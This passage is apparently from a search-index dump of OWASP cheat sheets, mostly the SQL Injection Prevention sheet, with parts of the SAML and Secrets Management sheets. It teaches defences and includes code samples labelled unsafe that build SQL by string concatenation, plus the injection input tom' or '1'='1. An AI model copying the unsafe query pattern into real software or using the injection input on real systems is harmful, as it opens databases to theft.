"},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#validate-binding-implementation","title":"Validate Binding Implementation","text":""},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#validate-security-countermeasures","title":"Validate Security Countermeasures","text":"

Revisit each security threat that exists within the SAML Security document and assert you have applied the appropriate countermeasures for threats that may exist for your particular implementation.

Additional countermeasures considered should include:

Need an architectural diagram? The SAML technical overview contains the most complete diagrams. For the Web Browser SSO Profile with Redirect/POST bindings refer to the section 4.1.3. In fact, of all the SAML documentation, the technical overview is the most valuable from a high-level perspective.

"},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#unsolicited-response-ie-idp-initiated-sso-considerations-for-service-providers","title":"Unsolicited Response (ie. IdP Initiated SSO) Considerations for Service Providers","text":"

Unsolicited Response is inherently less secure by design due to the lack of CSRF protection. However, it is supported by many due to the backwards compatibility feature of SAML 1.1. The general security recommendation is to not support this type of authentication, but if it must be enabled, the following steps (in additional to everything mentioned above) should help you secure this flow:

"},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#identity-provider-and-service-provider-considerations","title":"Identity Provider and Service Provider Considerations","text":"

The SAML protocol is rarely the vector of choice, though it's important to have cheatsheets to make sure that this is robust. The various endpoints are more targeted, so how the SAML token is generated and how it is consumed are both important in practice.

"},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#identity-provider-idp-considerations","title":"Identity Provider (IdP) Considerations","text":""},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#service-provider-sp-considerations","title":"Service Provider (SP) Considerations","text":""},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#input-validation","title":"Input Validation","text":"

Just because SAML is a security protocol does not mean that input validation goes away.

"},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#cryptography","title":"Cryptography","text":"

Solutions relying cryptographic algorithms need to follow the latest developments in cryptoanalysis.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html","title":"SQL Injection Prevention Cheat Sheet","text":""},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This article is focused on providing clear, simple, actionable guidance for preventing SQL Injection flaws in your applications. SQL Injection attacks are unfortunately very common, and this is due to two factors:

  1. the significant prevalence of SQL Injection vulnerabilities, and
  2. the attractiveness of the target (i.e., the database typically contains all the interesting/critical data for your application).

SQL Injection flaws are introduced when software developers create dynamic database queries constructed with string concatenation which includes user supplied input. To avoid SQL injection flaws is simple. Developers need to either: a) stop writing dynamic queries with string concatenation; and/or b) prevent user supplied input which contains malicious SQL from affecting the logic of the executed query.

This article provides a set of simple techniques for preventing SQL Injection vulnerabilities by avoiding these two problems. These techniques can be used with practically any kind of programming language with any type of database. There are other types of databases, like XML databases, which can have similar problems (e.g., XPath and XQuery injection) and these techniques can be used to protect them as well.

Primary Defenses:

Additional Defenses:

Unsafe Example:

SQL injection flaws typically look like this:

The following (Java) example is UNSAFE, and would allow an attacker to inject code into the query that would be executed by the database. The unvalidated \"customerName\" parameter that is simply appended to the query allows an attacker to inject any SQL code they want. Unfortunately, this method for accessing databases is all too common.

String\u00a0query\u00a0=\u00a0\"SELECT\u00a0account_balance\u00a0FROM\u00a0user_data\u00a0WHERE\u00a0user_name\u00a0=\u00a0\"\n+\u00a0request.getParameter(\"customerName\");\ntry\u00a0{\nStatement\u00a0statement\u00a0=\u00a0connection.createStatement(\u00a0...\u00a0);\nResultSet\u00a0results\u00a0=\u00a0statement.executeQuery(\u00a0query\u00a0);\n}\n...\n
"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#primary-defenses","title":"Primary Defenses","text":""},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#defense-option-1-prepared-statements-with-parameterized-queries","title":"Defense Option 1: Prepared Statements (with Parameterized Queries)","text":"

The use of prepared statements with variable binding (aka parameterized queries) is how all developers should first be taught how to write database queries. They are simple to write, and easier to understand than dynamic queries. Parameterized queries force the developer to first define all the SQL code, and then pass in each parameter to the query later. This coding style allows the database to distinguish between code and data, regardless of what user input is supplied.

Prepared statements ensure that an attacker is not able to change the intent of a query, even if SQL commands are inserted by an attacker. In the safe example below, if an attacker were to enter the userID of tom' or '1'='1, the parameterized query would not be vulnerable and would instead look for a username which literally matched the entire string tom' or '1'='1.

Language specific recommendations:

In rare circumstances, prepared statements can harm performance. When confronted with this situation, it is best to either a) strongly validate all data or b) escape all user supplied input using an escaping routine specific to your database vendor as described below, rather than using a prepared statement.

Safe Java Prepared Statement Example:

The following code example uses a PreparedStatement, Java's implementation of a parameterized query, to execute the same database query.

//\u00a0This\u00a0should\u00a0REALLY\u00a0be\u00a0validated\u00a0too\nString\u00a0custname\u00a0=\u00a0request.getParameter(\"customerName\");\n//\u00a0Perform\u00a0input\u00a0validation\u00a0to\u00a0detect\u00a0attacks\nString\u00a0query\u00a0=\u00a0\"SELECT\u00a0account_balance\u00a0FROM\u00a0user_data\u00a0WHERE\u00a0user_name\u00a0=\u00a0?\u00a0\";\nPreparedStatement pstmt = connection.prepareStatement( query );\npstmt.setString(\u00a01,\u00a0custname);\nResultSet\u00a0results\u00a0=\u00a0pstmt.executeQuery(\u00a0);\n

Safe C# .NET Prepared Statement Example:

With .NET, it's even more straightforward. The creation and execution of the query doesn't change. All you have to do is simply pass the parameters to the query using the Parameters.Add() call as shown here.

String\u00a0query\u00a0=\u00a0\"SELECT\u00a0account_balance\u00a0FROM\u00a0user_data\u00a0WHERE\u00a0user_name\u00a0=\u00a0?\";\ntry\u00a0{\nOleDbCommand\u00a0command\u00a0=\u00a0new\u00a0OleDbCommand(query,\u00a0connection);\ncommand.Parameters.Add(new OleDbParameter(\"customerName\", CustomerName Name.Text));\nOleDbDataReader\u00a0reader\u00a0=\u00a0command.ExecuteReader();\n//\u00a0\u2026\n}\u00a0catch\u00a0(OleDbException\u00a0se)\u00a0{\n//\u00a0error\u00a0handling\n}\n

We have shown examples in Java and .NET but practically all other languages, including Cold Fusion, and Classic ASP, support parameterized query interfaces. Even SQL abstraction layers, like the Hibernate Query Language (HQL) have the same type of injection problems (which we call HQL Injection). HQL supports parameterized queries as well, so we can avoid this problem:

Hibernate Query Language (HQL) Prepared Statement (Named Parameters) Examples:

//First\u00a0is\u00a0an\u00a0unsafe\u00a0HQL\u00a0Statement\nQuery\u00a0unsafeHQLQuery\u00a0=\u00a0session.createQuery(\"from\u00a0Inventory\u00a0where\u00a0productID='\"+userSuppliedParameter+\"'\");\n//Here\u00a0is\u00a0a\u00a0safe\u00a0version\u00a0of\u00a0the\u00a0same\u00a0query\u00a0using\u00a0named\u00a0parameters\nQuery\u00a0safeHQLQuery\u00a0=\u00a0session.createQuery(\"from\u00a0Inventory\u00a0where\u00a0productID=:productid\");\nsafeHQLQuery.setParameter(\"productid\",\u00a0userSuppliedParameter);\n

For examples of parameterized queries in other languages, including Ruby, PHP, Cold Fusion, Perl, and Rust, see the Query Parameterization Cheat Sheet or this site.

Developers tend to like the Prepared Statement approach because all the SQL code stays within the application. This makes your application relatively database independent.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#defense-option-2-stored-procedures","title":"Defense Option 2: Stored Procedures","text":"

Stored procedures are not always safe from SQL injection. However, certain standard stored procedure programming constructs have the same effect as the use of parameterized queries when implemented safely which is the norm for most stored procedure languages.

They require the developer to just build SQL statements with parameters which are automatically parameterized unless the developer does something largely out of the norm. The difference between prepared statements and stored procedures is that the SQL code for a stored procedure is defined and stored in the database itself, and then called from the application. Both of these techniques have the same effectiveness in preventing SQL injection so your organization should choose which approach makes the most sense for you.

Note: \"Implemented safely\" means the stored procedure does not include any unsafe dynamic SQL generation. Developers do not usually generate dynamic SQL inside stored procedures. However, it can be done, but should be avoided. If it can't be avoided, the stored procedure must use input validation or proper escaping as described in this article to make sure that all user supplied input to the stored procedure can't be used to inject SQL code into the dynamically generated query. Auditors should always look for uses of sp_execute, execute or exec within SQL Server stored procedures. Similar audit guidelines are necessary for similar functions for other vendors.

There are also several cases where stored procedures can increase risk. For example, on MS SQL server, you have 3 main default roles: db_datareader, db_datawriter and db_owner. Before stored procedures came into use, DBA's would give db_datareader or db_datawriter rights to the webservice's user, depending on the requirements. However, stored procedures require execute rights, a role that is not available by default. Some setups where the user management has been centralized, but is limited to those 3 roles, cause all web apps to run under db_owner rights so stored procedures can work. Naturally, that means that if a server is breached the attacker has full rights to the database, where previously they might only have had read-access.

Safe Java Stored Procedure Example:

The following code example uses a CallableStatement, Java's implementation of the stored procedure interface, to execute the same database query. The sp_getAccountBalance stored procedure would have to be predefined in the database and implement the same functionality as the query defined above.

//\u00a0This\u00a0should\u00a0REALLY\u00a0be\u00a0validated\nString\u00a0custname\u00a0=\u00a0request.getParameter(\"customerName\");\ntry\u00a0{\nCallableStatement cs = connection.prepareCall(\"{call sp_getAccountBalance(?)}\");\ncs.setString(1, custname);\nResultSet\u00a0results\u00a0=\u00a0cs.executeQuery();\n//\u00a0\u2026\u00a0result\u00a0set\u00a0handling\n}\u00a0catch\u00a0(SQLException\u00a0se)\u00a0{\n//\u00a0\u2026\u00a0logging\u00a0and\u00a0error\u00a0handling\n}\n

Safe VB .NET Stored Procedure Example:

The following code example uses a SqlCommand, .NET's implementation of the stored procedure interface, to execute the same database query. The sp_getAccountBalance stored procedure would have to be predefined in the database and implement the same functionality as the query defined above.

\u00a0Try\nDim\u00a0command\u00a0As\u00a0SqlCommand\u00a0=\u00a0new\u00a0SqlCommand(\"sp_getAccountBalance\",\u00a0connection)\ncommand.CommandType = CommandType.StoredProcedure\ncommand.Parameters.Add(new SqlParameter(\"@CustomerName\", CustomerName.Text))\nDim\u00a0reader\u00a0As\u00a0SqlDataReader\u00a0=\u00a0command.ExecuteReader()\n'...\nCatch\u00a0se\u00a0As\u00a0SqlException\n'error\u00a0handling\nEnd\u00a0Try\n
"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#defense-option-3-allow-list-input-validation","title":"Defense Option 3: Allow-list Input Validation","text":"

Various parts of SQL queries aren't legal locations for the use of bind variables, such as the names of tables or columns, and the sort order indicator (ASC or DESC). In such situations, input validation or query redesign is the most appropriate defense. For the names of tables or columns, ideally those values come from the code, and not from user parameters.

But if user parameter values are used for targeting different table names and column names, then the parameter values should be mapped to the legal/expected table or column names to make sure unvalidated user input doesn't end up in the query. Please note, this is a symptom of poor design and a full rewrite should be considered if time allows.

Here is an example of table name validation.

String\u00a0tableName;\nswitch(PARAM):\n\u00a0\u00a0case\u00a0\"Value1\":\u00a0tableName\u00a0=\u00a0\"fooTable\";\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0break;\n\u00a0\u00a0case\u00a0\"Value2\":\u00a0tableName\u00a0=\u00a0\"barTable\";\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0break;\n\u00a0\u00a0...\n \u00a0default\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0:\u00a0throw\u00a0new\u00a0InputValidationException(\"unexpected\u00a0value\u00a0provided\"\n                                                  + \" for\u00a0table\u00a0name\");\n

The tableName can then be directly appended to the SQL query since it is now known to be one of the legal and expected values for a table name in this query. Keep in mind that generic table validation functions can lead to data loss as table names are used in queries where they are not expected.

For something simple like a sort order, it would be best if the user supplied input is converted to a boolean, and then that boolean is used to select the safe value to append to the query. This is a very standard need in dynamic query creation.

For example:

public\u00a0String\u00a0someMethod(boolean\u00a0sortOrder)\u00a0{\nString\u00a0SQLquery\u00a0=\u00a0\"some\u00a0SQL\u00a0...\u00a0order\u00a0by\u00a0Salary\u00a0\"\u00a0+\u00a0(sortOrder\u00a0?\u00a0\"ASC\"\u00a0:\u00a0\"DESC\");`\n...\n

Any time user input can be converted to a non-String, like a date, numeric, boolean, enumerated type, etc. before it is appended to a query, or used to select a value to append to the query, this ensures it is safe to do so.

Input validation is also recommended as a secondary defense in ALL cases, even when using bind variables as is discussed later in this article. More techniques on how to implement strong input validation is described in the Input Validation Cheat Sheet.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#defense-option-4-escaping-all-user-supplied-input","title":"Defense Option 4: Escaping All User-Supplied Input","text":"

This technique should only be used as a last resort, when none of the above are feasible. Input validation is probably a better choice as this methodology is frail compared to other defenses and we cannot guarantee it will prevent all SQL Injections in all situations.

This technique is to escape user input before putting it in a query. It is very database specific in its implementation. It's usually only recommended to retrofit legacy code when implementing input validation isn't cost effective. Applications built from scratch, or applications requiring low risk tolerance should be built or re-written using parameterized queries, stored procedures, or some kind of Object Relational Mapper (ORM) that builds your queries for you.

This technique works like this. Each DBMS supports one or more character escaping schemes specific to certain kinds of queries. If you then escape all user supplied input using the proper escaping scheme for the database you are using, the DBMS will not confuse that input with SQL code written by the developer, thus avoiding any possible SQL injection vulnerabilities.

The OWASP Enterprise Security API (ESAPI) is a free, open source, web application security control library that makes it easier for programmers to write lower-risk applications. The ESAPI libraries are designed to make it easier for programmers to retrofit security into existing applications. The ESAPI libraries also serve as a solid foundation for new development:

To find the javadoc specifically for the database encoders, click on the Codec class on the left hand side. There are lots of Codecs implemented. The two Database specific codecs are OracleCodec, and MySQLCodec.

Just click on their names in the All Known Implementing Classes: at the top of the Interface Codec page.

At this time, ESAPI currently has database encoders for:

Database encoders are forthcoming for:

If your database encoder is missing, please let us know.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#database-specific-escaping-details","title":"Database Specific Escaping Details","text":"

If you want to build your own escaping routines, here are the escaping details for each of the databases that we have developed ESAPI Encoders for:

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#oracle-escaping","title":"Oracle Escaping","text":"

This information is based on the Oracle Escape character information.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#escaping-dynamic-queries","title":"Escaping Dynamic Queries","text":"

To use an ESAPI database codec is pretty simple. An Oracle example looks something like:

ESAPI.encoder().encodeForSQL(\u00a0new\u00a0OracleCodec(),\u00a0queryparam\u00a0);\n

So, if you had an existing Dynamic query being generated in your code that was going to Oracle that looked like this:

String\u00a0query\u00a0=\u00a0\"SELECT\u00a0user_id\u00a0FROM\u00a0user_data\u00a0WHERE\u00a0user_name\u00a0=\u00a0'\"\n+\u00a0req.getParameter(\"userID\")\n+\u00a0\"'\u00a0and\u00a0user_password\u00a0=\u00a0'\"\u00a0+\u00a0req.getParameter(\"pwd\")\u00a0+\"'\";\ntry\u00a0{\nStatement\u00a0statement\u00a0=\u00a0connection.createStatement(\u00a0\u2026\u00a0);\nResultSet\u00a0results\u00a0=\u00a0statement.executeQuery(\u00a0query\u00a0);\n}\n

You would rewrite the first line to look like this:

Codec ORACLE_CODEC = new OracleCodec();\nString query = \"SELECT user_id FROM user_data WHERE user_name = '\"\n+ ESAPI.encoder().encodeForSQL( ORACLE_CODEC, req.getParameter(\"userID\"))\n+ \"' and user_password = '\"\n+ ESAPI.encoder().encodeForSQL( ORACLE_CODEC, req.getParameter(\"pwd\")) +\"'\";\n

And it would now be safe from SQL injection, regardless of the input supplied.

For maximum code readability, you could also construct your own OracleEncoder:

Encoder oe = new OracleEncoder();\nString query = \"SELECT user_id FROM user_data WHERE user_name = '\"\n+ oe.encode( req.getParameter(\"userID\")) + \"' and user_password = '\"\n+ oe.encode( req.getParameter(\"pwd\")) +\"'\";\n

With this type of solution, you would need only to wrap each user-supplied parameter being passed into an ESAPI.encoder().encodeForOracle( ) call or whatever you named the call and you would be done.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#turn-off-character-replacement","title":"Turn off character replacement","text":"

Use SET DEFINE OFF or SET SCAN OFF to ensure that automatic character replacement is turned off. If this character replacement is turned on, the & character will be treated like a SQLPlus variable prefix that could allow an attacker to retrieve private data.

See here and here for more information

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#escaping-wildcard-characters-in-like-clauses","title":"Escaping Wildcard characters in Like Clauses","text":"

The LIKE keyword allows for text scanning searches. In Oracle, the underscore _ character matches only one character, while the ampersand % is used to match zero or more occurrences of any characters. These characters must be escaped in LIKE clause criteria.

For example:

SELECT\u00a0name\u00a0FROM\u00a0emp\u00a0WHERE\u00a0id\u00a0LIKE\u00a0'%/_%'\u00a0ESCAPE\u00a0'/';\n\nSELECT\u00a0name\u00a0FROM\u00a0emp\u00a0WHERE\u00a0id\u00a0LIKE\u00a0'%\\%%'\u00a0ESCAPE\u00a0'\\';\n
"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#oracle-10g-escaping","title":"Oracle 10g escaping","text":"

An alternative for Oracle 10g and later is to place { and } around the string to escape the entire string. However, you have to be careful that there isn't a } character already in the string. You must search for these and if there is one, then you must replace it with }}. Otherwise that character will end the escaping early, and may introduce a vulnerability.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#mysql-escaping","title":"MySQL Escaping","text":"

MySQL supports two escaping modes:

  1. ANSI_QUOTES SQL mode, and a mode with this off, which we call
  2. MySQL mode.

ANSI SQL mode: Simply encode all ' (single tick) characters with '' (two single ticks)

MySQL mode, do the following:

NUL (0x00) --> \\0  [This is a zero, not the letter O]\nBS  (0x08) --> \\b\nTAB (0x09) --> \\t\nLF  (0x0a) --> \\n\nCR  (0x0d) --> \\r\nSUB (0x1a) --> \\Z\n\"   (0x22) --> \\\"\n%   (0x25) --> \\%\n'   (0x27) --> \\'\n\\   (0x5c) --> \\\\\n_   (0x5f) --> \\_\nall other non-alphanumeric characters with ASCII values\nless than 256  --> \\c where 'c' is the original non-alphanumeric character.\n

This information is based on the MySQL Escape character information.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#sql-server-escaping","title":"SQL Server Escaping","text":"

We have not implemented the SQL Server escaping routine yet, but the following has good pointers and links to articles describing how to prevent SQL injection attacks on SQL server, see here.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#db2-escaping","title":"DB2 Escaping","text":"

This information is based on DB2 WebQuery special characters as well as some information from Oracle's JDBC DB2 driver.

Information in regards to differences between several DB2 Universal drivers.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#hex-encoding-all-input","title":"Hex-encoding all input","text":"

A somewhat special case of escaping is the process of hex-encode the entire string received from the user (this can be seen as escaping every character). The web application should hex-encode the user input before including it in the SQL statement. The SQL statement should take into account this fact, and accordingly compare the data.

For example, if we have to look up a record matching a sessionID, and the user transmitted the string abc123 as the session ID, the select statement would be:

SELECT\u00a0...\u00a0FROM\u00a0session WHERE\u00a0hex_encode(sessionID)\u00a0=\u00a0'616263313233'\n

hex_encode should be replaced by the particular facility for the database being used. The string 606162313233 is the hex encoded version of the string received from the user (it is the sequence of hex values of the ASCII/UTF-8 codes of the user data).

If an attacker were to transmit a string containing a single-quote character followed by their attempt to inject SQL code, the constructed SQL statement will only look like:

... WHERE\u00a0hex_encode\u00a0(\u00a0...\u00a0)\u00a0=\u00a0'2720\u00a0...\u00a0'\n

27 being the ASCII code (in hex) of the single-quote, which is simply hex-encoded like any other character in the string. The resulting SQL can only contain numeric digits and letters a to f, and never any special character that could enable an SQL injection.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#escaping-sqli-in-php","title":"Escaping SQLi in PHP","text":"

Use prepared statements and parameterized queries. These are SQL statements that are sent to and parsed by the database server separately from any parameters. This way it is impossible for an attacker to inject malicious SQL.

You basically have two options to achieve this:

  1. Using PDO (for any supported database driver):
$stmt = $pdo->prepare('SELECT * FROM employees WHERE name = :name');\n$stmt->execute(array('name' => $name));\nforeach ($stmt as $row) {\n    // do something with $row\n}\n
  1. Using MySQLi (for MySQL):
$stmt = $dbConnection->prepare('SELECT * FROM employees WHERE name = ?');\n$stmt->bind_param('s', $name);\n$stmt->execute();\n$result = $stmt->get_result();\nwhile ($row = $result->fetch_assoc()) {\n    // do something with $row\n}\n

PDO is the universal option. If you're connecting to a database other than MySQL, you can refer to a driver-specific second option (e.g. pg_prepare() and pg_execute() for PostgreSQL).

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#additional-defenses","title":"Additional Defenses","text":"

Beyond adopting one of the four primary defenses, we also recommend adopting all of these additional defenses in order to provide defense in depth. These additional defenses are:

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#least-privilege","title":"Least Privilege","text":"

To minimize the potential damage of a successful SQL injection attack, you should minimize the privileges assigned to every database account in your environment. Do not assign DBA or admin type access rights to your application accounts. We understand that this is easy, and everything just \"works\" when you do it this way, but it is very dangerous.

Start from the ground up to determine what access rights your application accounts require, rather than trying to figure out what access rights you need to take away. Make sure that accounts that only need read access are only granted read access to the tables they need access to.

If an account only needs access to portions of a table, consider creating a view that limits access to that portion of the data and assigning the account access to the view instead, rather than the underlying table. Rarely, if ever, grant create or delete access to database accounts.

If you adopt a policy where you use stored procedures everywhere, and don't allow application accounts to directly execute their own queries, then restrict those accounts to only be able to execute the stored procedures they need. Don't grant them any rights directly to the tables in the database.

SQL injection is not the only threat to your database data. Attackers can simply change the parameter values from one of the legal values they are presented with, to a value that is unauthorized for them, but the application itself might be authorized to access. As such, minimizing the privileges granted to your application will reduce the likelihood of such unauthorized access attempts, even when an attacker is not trying to use SQL injection as part of their exploit.

While you are at it, you should minimize the privileges of the operating system account that the DBMS runs under. Don't run your DBMS as root or system! Most DBMSs run out of the box with a very powerful system account. For example, MySQL runs as system on Windows by default! Change the DBMS's OS account to something more appropriate, with restricted privileges.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#multiple-db-users","title":"Multiple DB Users","text":"

The designers of web applications should avoid using the same owner/admin account in the web applications to connect to the database. Different DB users should be used for different web applications.

In general, each separate web application that requires access to the database should have a designated database user account that the application will use to connect to the DB. That way, the designer of the application can have good granularity in the access control, thus reducing the privileges as much as possible. Each DB user will then have select access to what it needs only, and write-access as needed.

As an example, a login page requires read access to the username and password fields of a table, but no write access of any form (no insert, update, or delete). However, the sign-up page certainly requires insert privilege to that table; this restriction can only be enforced if these web apps use different DB users to connect to the database.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#views","title":"Views","text":"

You can use SQL views to further increase the granularity of access by limiting the read access to specific fields of a table or joins of tables. It could potentially have additional benefits: for example, suppose that the system is required (perhaps due to some specific legal requirements) to store the passwords of the users, instead of salted-hashed passwords.

The designer could use views to compensate for this limitation; revoke all access to the table (from all DB users except the owner/admin) and create a view that outputs the hash of the password field and not the field itself. Any SQL injection attack that succeeds in stealing DB information will be restricted to stealing the hash of the passwords (could even be a keyed hash), since no DB user for any of the web applications has access to the table itself.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#allow-list-input-validation","title":"Allow-list Input Validation","text":"

In addition to being a primary defense when nothing else is possible (e.g., when a bind variable isn't legal), input validation can also be a secondary defense used to detect unauthorized input before it is passed to the SQL query. For more information please see the Input Validation Cheat Sheet. Proceed with caution here. Validated data is not necessarily safe to insert into SQL queries via string building.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#related-articles","title":"Related Articles","text":"

SQL Injection Attack Cheat Sheets:

The following articles describe how to exploit different kinds of SQL Injection Vulnerabilities on various platforms that this article was created to help you avoid:

Description of SQL Injection Vulnerabilities:

How to Avoid SQL Injection Vulnerabilities:

How to Review Code for SQL Injection Vulnerabilities:

How to Test for SQL Injection Vulnerabilities:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html","title":"Secrets Management Cheat Sheet","text":""},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#1-introduction","title":"1 Introduction","text":"

Secrets are being used everywhere nowadays, especially with the popularity of the DevOps movement. Application Programming Interface (API) keys, database credentials, Identity and Access Management (IAM) permissions, Secure Shell (SSH) keys, certificates, etc. Many organizations have them hardcoded within the source code in plaintext, littered throughout configuration files and configuration management tools.

There is a growing need for organizations to centralize the storage, provisioning, auditing, rotation and management of secrets to control access to secrets and prevent them from leaking and compromising the organization. Often, services share the same secrets, which makes identifying the source of compromise or leak challenging.

This cheat sheet offers best practices and guidelines to help properly implement secrets management.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#2-general-secrets-management","title":"2 General Secrets Management","text":"

The following sections address the main concepts relating to secrets management.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#21-high-availability","title":"2.1 High Availability","text":"

It is vital to select a technology that is robust enough to service traffic reliably:

Such a service could receive a considerable volume of requests within a large organization.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#22-centralize-and-standardize","title":"2.2 Centralize and Standardize","text":"

Secrets used by your DevOps teams for your applications might be consumed differently than secrets stored by your marketeers or your SRE team. You often find poorly maintained secrets where the needs of secret consumers or producers mismatch. Therefore, you must standardize and centralize the secrets management solution with care. Standardizing and centralizing can mean that you use multiple secret management solutions. For instance: your cloud-native development teams choose to use the solution provided by the cloud provider, while your private cloud uses a third-party solution, and everybody has an account for a selected password manager. By making sure that the teams standardize the interaction with these different solutions, they remain maintainable and usable in the event of an incident. Even when a company centralizes its secrets management to just one solution, you will often have to secure the master secret of that secrets management solution in a secondary secrets management solution. For instance, you can use a cloud provider's facilities to store secrets, but that cloud provider's root/management credentials need to be stored somewhere else.

Standardization should include Secrets life cycle management, Authentication, Authorization, and Accounting of the secrets management solution, and life cycle management. Note that it should be immediately apparent to an organization what a secret is used for and where to find it. The more Secrets management solutions you use, the more documentation you need.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#23-access-control","title":"2.3 Access Control","text":"

When users can read the secret in a secret management system and/or update it, it means that the secret can now leak through that user and the system he used to touch the secret. Therefore, engineers should not have access to all secrets in the secrets management system, and the Least Privilege principle should be applied. The secret management system needs to provide the ability to configure fine granular access controls on each object and component to accomplish the Least Privilege principle.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#24-automate-secrets-management","title":"2.4 Automate Secrets Management","text":"

Manual maintenance does not only increase the risk of leakage; it introduces the risk of human errors while maintaining the secret. Furthermore, it can become wasteful. Therefore, it is better to limit or remove the human interaction with the actual secrets. You can restrict human interaction in multiple ways:

Rotating certain keys, such as encryption keys, might trigger full or partial data re-encryption. Different strategies for rotating keys exist:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#25-auditing","title":"2.5 Auditing","text":"

Auditing is an essential part of secrets management due to the nature of the application. You must implement auditing securely to be resilient against attempts to tamper with or delete the audit logs. At a minimum, you should audit the following:

It is essential that all auditing has correct timestamps. Therefore, the secret management solution should have proper time sync protocols set up at its supporting infrastructure. You should monitor the stack on which the solution runs for possible clock-skew and manual time adjustments.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#26-secret-lifecycle","title":"2.6 Secret Lifecycle","text":"

Secrets follow a lifecycle. The stages of the lifecycle are as follows:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#261-creation","title":"2.6.1 Creation","text":"

New secrets must be securely generated and cryptographically robust enough for their purpose. Secrets must have the minimum privileges assigned to them to enable their required use/role.

You should transmit credentials securely, such that ideally, you don't send the password along with the username when requesting user accounts. Instead, you should send the password via a secure channel (e.g. mutually authenticated connection) or a side-channel such as push notification, SMS, email. Refer to the Multi-Factor Authentication Cheat Sheet to learn about the pros and cons of each channel.

Applications may not benefit from having multiple communication channels, so you must provision credentials securely.

See the Open CRE project on secrets lookup for more technical recommendations on secret creation.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#262-rotation","title":"2.6.2 Rotation","text":"

You should regularly rotate secrets so that any stolen credentials will only work for a short time. Regular rotation will also reduce the tendency for users to fall back to bad habits such as re-using credentials.

Depending on a secret's function and what it protects, the lifetime could be from minutes (think end-to-end encrypted chats with perfect forward secrecy) to years (consider hardware secrets).

User credentials are excluded from regular rotating. These should only be rotated if there is suspicion or evidence that they have been compromised, according to NIST recommendations.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#263-revocation","title":"2.6.3 Revocation","text":"

When secrets are no longer required or potentially compromised, you must securely revoke them to restrict access. With (TLS) certificates, this also involves certificate revocation.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#264-expiration","title":"2.6.4 Expiration","text":"

You should create secrets to expire after a defined time where possible. This expiration can either be active expiration by the secret consuming system, or an expiration date set at the secrets management system forcing supporting processes to be triggered, resulting in a secret rotation. You should apply policies through the secrets management solution to ensure credentials are only made available for a limited time appropriate for the type of credentials. Applications should verify that the secret is still active before trusting it.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#27-transport-layer-security-tls-everywhere","title":"2.7 Transport Layer Security (TLS) Everywhere","text":"

Never transmit secrets via plaintext. In this day and age, there is no excuse given the ubiquitous adoption of TLS.

Furthermore, you can effectively use secrets management solutions to provision TLS certificates.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#28-downtime-break-glass-backup-and-restore","title":"2.8 Downtime, Break-glass, Backup and Restore","text":"

Consider the possibility that a secrets management service becomes unavailable for various reasons, such as scheduled downtime for maintenance. It could be impossible to retrieve the credentials required to restore the service if you did not previously acquire them. Thus, choose maintenance windows carefully based on earlier metrics and audit logs.

Next, the backup and restore procedures of the system should be regularly tested and audited for their security. A few requirements regarding backup & restore. Ensure that:

